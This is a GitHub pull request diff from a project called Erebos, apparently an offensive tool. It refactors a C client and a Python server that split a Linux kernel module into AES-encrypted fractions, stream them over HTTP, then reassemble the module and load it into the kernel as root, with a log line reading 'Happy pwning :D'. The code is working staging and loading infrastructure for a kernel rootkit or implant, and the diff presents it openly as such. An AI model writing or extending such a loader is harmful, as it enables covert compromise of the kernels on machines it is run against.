Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Implement data-stream like functionality for the server #47

Merged
merged 6 commits into from
Nov 1, 2024
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion client/src/load.c
Original file line number Diff line number Diff line change
Expand Up @@ -90,7 +90,7 @@ int load_lkm(const uint8_t *lkm, ssize_t total_size) {
return -1;
}

log_debug("Module loaded successfully");
log_info("Module loaded successfully. Happy pwning :D");
close(fdlkm);

return 0;
Expand Down
74 changes: 41 additions & 33 deletions client/src/main.c
Original file line number Diff line number Diff line change
Expand Up @@ -9,6 +9,8 @@
#include "../include/log.h"
#include "../include/sock.h"
#include "../include/utils.h"

/* server address */
#define SERVER_IP "127.0.0.1"
#define SERVER_PORT "8000"

Expand Down Expand Up @@ -98,33 +100,32 @@ static fraction_t *fetch_fractions(int sfd, int *fraction_count) {
http_res_t http_fraction_res = {0};

fraction_t *fractions = NULL;
char fraction_url[50];
int i, num_fractions;

int i, num_links;
char *line;
snprintf(fraction_url, 50, "http://%s:%s/stream", SERVER_IP, SERVER_PORT);

if (http_get(sfd, "/", &http_fraction_res) != HTTP_SUCCESS) {
if (http_get(sfd, "/size", &http_fraction_res) != HTTP_SUCCESS) {
log_error("Failed to retrieve fraction links");
}

log_debug("Retrieved fraction links");

num_links = count_lines(http_fraction_res.data) + 1;

log_debug("%d links found", num_links);
num_fractions = atoi(http_fraction_res.data);
log_debug("Fetching %d fractions", num_fractions);

fractions = calloc(num_links, sizeof(fraction_t));
fractions = calloc(num_fractions, sizeof(fraction_t));
if (!fractions) {
log_error("Failed to allocate memory for fractions");
http_free(&http_fraction_res);
return NULL;
}

i = 0;
line = strtok(http_fraction_res.data, "\n");
while (line != NULL && i < num_links) {
log_debug("Downloading %s", line);
while (i < num_fractions) {
log_debug("Downloading fraction no.%d", i);

if (download_fraction(sfd, line, &fractions[i]) != 0) {
if (download_fraction(sfd, fraction_url, &fractions[i]) != 0) {
log_error("Failed to download fraction");

// we have to cleanup only until i because the other fractions have not
Expand All @@ -135,7 +136,6 @@ static fraction_t *fetch_fractions(int sfd, int *fraction_count) {
}

i++;
line = strtok(NULL, "\n");
}

http_free(&http_fraction_res);
Expand All @@ -155,58 +155,66 @@ int main(void) {
uint8_t *module = NULL;
ssize_t module_size;

/* We need root permissions to load LKMs */
if (geteuid() != 0) {
log_error("This program needs to be run as root!");
exit(1);
}

/* initialize PRNG and set logging level */
init_random();
log_set_level(LOG_DEBUG);

/* open a connection to the server */
sfd = do_connect();
if (sfd < 0) {
return EXIT_FAILURE;
goto cleanup;
}

/* receive the AES key */
aes_key = get_aes_key(sfd, &key_len);
if (aes_key == NULL) {
close(sfd);
return EXIT_FAILURE;
goto cleanup;
}

/* download and sort the fractions*/
fractions = fetch_fractions(sfd, &fraction_count);
if (fractions == NULL) {
free(aes_key);
close(sfd);
return EXIT_FAILURE;
goto cleanup;
}

log_info("Downloaded fractions");

qsort(fractions, fraction_count, sizeof(fraction_t), compare_fractions);
log_info("Downloaded fractions");

/* decrypt the fractions and assemble the LKM */
module = decrypt_lkm(fractions, fraction_count, &module_size, aes_key);
if (module == NULL) {
log_error("There was an error creating the module");
cleanup_fraction_array(fractions, fraction_count);
free(aes_key);
close(sfd);
return EXIT_FAILURE;
goto cleanup;
}

/* load the LKM in the kernel */
if (load_lkm(module, module_size) < 0) {
log_error("Error loading LKM");
free(module);
cleanup_fraction_array(fractions, fraction_count);
free(aes_key);
close(sfd);
return EXIT_FAILURE;
goto cleanup;
}

free(module);
/* cleanup */
close(sfd);
cleanup_fraction_array(fractions, fraction_count);
free(module);
free(aes_key);
close(sfd);

return EXIT_SUCCESS;
return EXIT_SUCCESS; // hooray!!!

/* Encapsulate cleanup */
cleanup:
if (sfd != -1) close(sfd);
if (fractions) cleanup_fraction_array(fractions, fraction_count);

free(module);
free(aes_key);

return EXIT_FAILURE;

}
64 changes: 6 additions & 58 deletions server/fractionator.py
Original file line number Diff line number Diff line change
Expand Up @@ -9,21 +9,21 @@

import zlib


class Fractionator(utils.AES_WITH_IV_HELPER):
MAGIC: int = 0xDEADBEEF
CHUNK_SIZE: int = 8192
FRACTION_PATH_LEN: int = 16
algorithm = algorithms.AES256
mode = modes.CBC

def __init__(self, out_path: str, key: bytes) -> None:
def __init__(self, key: bytes) -> None:
"""Prepare a Fractionator object for reading and generating fractions."""
self.file_path: str = NotImplemented
self.file_size: int = 0
self.out_path: str = out_path

self._fractions: list[Fraction] = []
self.fraction_paths: list[str] = []
self.fractions: list[bytes] = []

self._buf_reader: Optional[io.BufferedReader] = None

Expand Down Expand Up @@ -64,62 +64,11 @@ def make_fractions(self) -> None:
for i in range(num_chunks):
self._make_fraction(i)

def _write_fraction(self, fraction: Fraction) -> None:
"""Write a fraction to a file."""
path = os.path.join(
self.out_path, utils.random_string(Fractionator.FRACTION_PATH_LEN)
)
with open(path, "wb") as f:
f.write(fraction.header_to_bytes())
f.write(fraction.data)
self.fraction_paths.append(path)
logging.debug(f"Wrote fraction #{fraction.index} to {path}")

def write_fractions(self) -> None:
"""Write all fractions to disk."""
os.makedirs(self.out_path, exist_ok=True)
for fraction in self._fractions:
self._write_fraction(fraction)

def save_backup(self, backup_path: str) -> None:
"""Save fraction paths to a backup file."""
try:
data = "".join((path + "\n" for path in self.fraction_paths)).encode()

with open(backup_path, "wb") as f:
f.write(zlib.compress(data))

logging.debug(f"Backup saved at {backup_path}.")
except OSError as e:
logging.error(f"Failed to save backup: {e}")

def load_backup(self, backup_path: str) -> None:
"""Load fraction paths from a backup file."""
try:
with open(backup_path, "rb") as f:
data = zlib.decompress(f.read()).decode().split("\n")
self.fraction_paths = [line.strip() for line in data]

logging.debug(f"Loaded {len(self.fraction_paths)} paths from backup.")
except OSError as e:
logging.error(f"Failed to load backup: {e}")
return

def _clean_fraction(self, path: str) -> None:
"""Delete a fraction file."""
try:
os.remove(path)
logging.debug(f"Removed {path}.")
except FileNotFoundError:
logging.debug(f"File not found: {path}")

def clean_fractions(self) -> None:
"""Delete all written fractions."""
logging.info("Cleaning fractions...")
for path in self.fraction_paths:
self._clean_fraction(path)
self.fraction_paths.clear()
logging.info("Cleaning complete.")
fraction_data = fraction.header_to_bytes() + fraction.data
self.fractions.append(fraction_data)

def close_stream(self) -> None:
"""Close the file stream if open."""
Expand All @@ -128,11 +77,10 @@ def close_stream(self) -> None:
self._buf_reader = None
logging.debug(f"Closed stream to {self.file_path}.")

def finalize(self, backup_path: str) -> None:
def finalize(self) -> None:
"""Create, write and save a backup of the fractions"""
self.make_fractions()
self.write_fractions()
self.save_backup(backup_path)

def __del__(self) -> None:
self.close_stream()
45 changes: 4 additions & 41 deletions server/main.py
Original file line number Diff line number Diff line change
Expand Up @@ -17,8 +17,6 @@
format="[%(levelname)s: %(funcName)s] %(message)s", level=logging.INFO
)

BACKUP_FILENAME = ".erebos_bckp"


def handle_args(parser: argparse.ArgumentParser):
"""Configure the given ArgumentParser"""
Expand All @@ -29,25 +27,13 @@ def handle_args(parser: argparse.ArgumentParser):
metavar="ADDRESS",
help="bind to this address " "(default: all interfaces)",
)
parser.add_argument(
"-o",
"--output",
default=os.getcwd(),
help="Output directory" "(default: current directory)",
)
parser.add_argument(
"port",
default=8000,
type=int,
nargs="?",
help="bind to this port " "(default: %(default)s)",
)
parser.add_argument(
"--clean", action="store_true", help="Clean generated fraction files"
)
parser.add_argument(
"--rm-backup", action="store_true", help="Remove the generated backup file"
)
return parser.parse_args()


Expand All @@ -71,20 +57,6 @@ def generate_aes_key() -> bytes:
return key


def handle_cleanup(fractionator: Fractionator, backup_path: str) -> None:
"""Clean up fractions and remove backup file if necessary."""
if os.path.exists(backup_path):
fractionator.load_backup(backup_path)
fractionator.clean_fractions()
try:
os.remove(backup_path)
logging.info(f"Backup file '{backup_path}' removed.")
except FileNotFoundError:
logging.critical(f"Backup file '{backup_path}' not found.")
else:
logging.warning(f"No file found at '{backup_path}'.")


if __name__ == "__main__":
# ensure dual-stack is not disabled; ref #38907
class DualStackServer(ThreadingHTTPServer):
Expand All @@ -95,38 +67,29 @@ def server_bind(self):
return super().server_bind()

def finish_request(self, request, client_address):
self.RequestHandlerClass(
request, client_address, self, directory=args.output
)
self.RequestHandlerClass(request, client_address, self)

# Parse command-line arguments
parser = argparse.ArgumentParser(
description="Erebos Server: Prepares and stages the LKM over HTTP"
)
args = handle_args(parser)

# Finalize the output/backup paths
out_path = os.path.abspath(args.output)
backup_path = os.path.join(out_path, BACKUP_FILENAME)

# Initialize the fractionator
key = generate_aes_key()
fractionator = Fractionator(out_path, key)

handle_cleanup(fractionator, backup_path)
if args.clean:
sys.exit(0)
fractionator = Fractionator(key)

# Set up Fractionator with the provided file path
file_path = validate_lkm_object_file(args.file)
fractionator.file_path = file_path
# Prepare the fractions
fractionator.finalize(backup_path)
fractionator.finalize()

# Start the server for staging fractions
start_server(
ServerClass=DualStackServer,
port=args.port,
bind=args.bind,
aes_key=fractionator.key,
fraction_data=fractionator.fractions,
)
Loading
Loading